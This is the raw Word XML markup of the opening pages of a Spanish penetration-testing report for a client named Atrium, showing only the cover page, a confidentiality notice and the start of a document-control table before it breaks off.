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444D55"/>
  <w:body>
    <w:p w14:paraId="6F2354F1" w14:textId="0FD0FC0F" w:rsidR="00437FF1" w:rsidRDefault="00000000" w:rsidP="006A21C9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1416"/>
        <w:divId w:val="706372907"/>
        <w:rPr>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t xml:space="preserve">        Informe de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t xml:space="preserve"> para </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397E8342" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="706372907"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Atrium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E4F6C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="706372907"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B9B0E9" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="706372907"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="65B2AB2E">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4A9D9" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="706372907"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t>Fecha: 2025-12-06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">Nombre del documento: Proyect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB49D16" w14:textId="6433AD20" w:rsidR="00437FF1" w:rsidRDefault="006A21C9">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="center"/>
        <w:divId w:val="706372907"/>
      </w:pPr>
      <w:r w:rsidRPr="006A21C9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D857DF1" wp14:editId="0A102F7B">
            <wp:extent cx="3209925" cy="2447925"/>
            <wp:effectExtent l="95250" t="76200" r="85725" b="1076325"/>
            <wp:docPr id="2146037005" name="Imagen 1" descr="Imagen que contiene azul, alimentos, palo, pája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37005" name="Imagen 1" descr="Imagen que contiene azul, alimentos, palo, pájaro&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3210379" cy="2448271"/>
                    </a:xfrm>
                    <a:prstGeom prst="ellipse">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="63500" cap="rnd">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>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rsidR="00000000">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB11C2" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="706372907"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Copyright © 2025 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BlackStone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> rights reserved. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E5253A" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="706372907"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D215B0" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="706372907"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E96BED4" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="706372907"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0823A635" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="706372907"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AABF4E7" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="706372907"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DF1DDC" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37892F87" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="1076631329"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F12722" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="1076631329"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52771C11" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="1076631329"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7C946A" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="1076631329"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5670FC" w14:textId="31C68E3E" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:pStyle w:val="tableparagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="1076631329"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732D0146" w14:textId="00CA17FD" w:rsidR="00437FF1" w:rsidRPr="006A21C9" w:rsidRDefault="00000000" w:rsidP="006A21C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096BE03" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52043C00" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">AVISO LEGAL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077EADB6" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DACD33" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este documento contiene información confidencial y propietaria la cual es de uso exclusivo de Atrium. La reproducción o uso no autorizado de este documento está totalmente prohibido. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FEEC33" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB85618" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB89F8" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTROL DE DOCUMENTO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078D239" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="284" w:right="461"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>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2"/>
        <w:gridCol w:w="5912"/>
      </w:tblGrid>
      <w:tr w:rsidR="00437FF1" w14:paraId="1F10D494" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="700"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1836" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="191C24"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4625BA76" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="tableparagraph"/>
              <w:spacing w:before="121" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NOMBRE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DOCUMENTO:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7844"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306F0DF8" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="tableparagraph"/>
              <w:spacing w:before="5" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F77B96A" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="tableparagraph"/>
              <w:spacing w:before="1" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Proyect </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Report</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Master</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="0CA119AB" w14:textId="77777777">
        <w:trPr>
          <w:divId w:val="198251480"/>
          <w:trHeight w:val="700"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1836" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="191C24"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B7E6AA" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="tableparagraph"/>
              <w:spacing w:before="221" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AUTOR:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7844"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2118EABE" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="tableparagraph"/>
              <w:spacing w:before="5" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53F22C7A" w14:textId="28421516" w:rsidR="00437FF1" w:rsidRPr="006A21C9" w:rsidRDefault="006A21C9">
            <w:pPr>
              <w:pStyle w:val="tableparagraph"/>
              <w:spacing w:before="1" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="284" w:right="461"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A21C9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Johnny Corona</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437FF1" w14:paraId="66EDF307" w14:textId="77777777">
        <w:trPr>
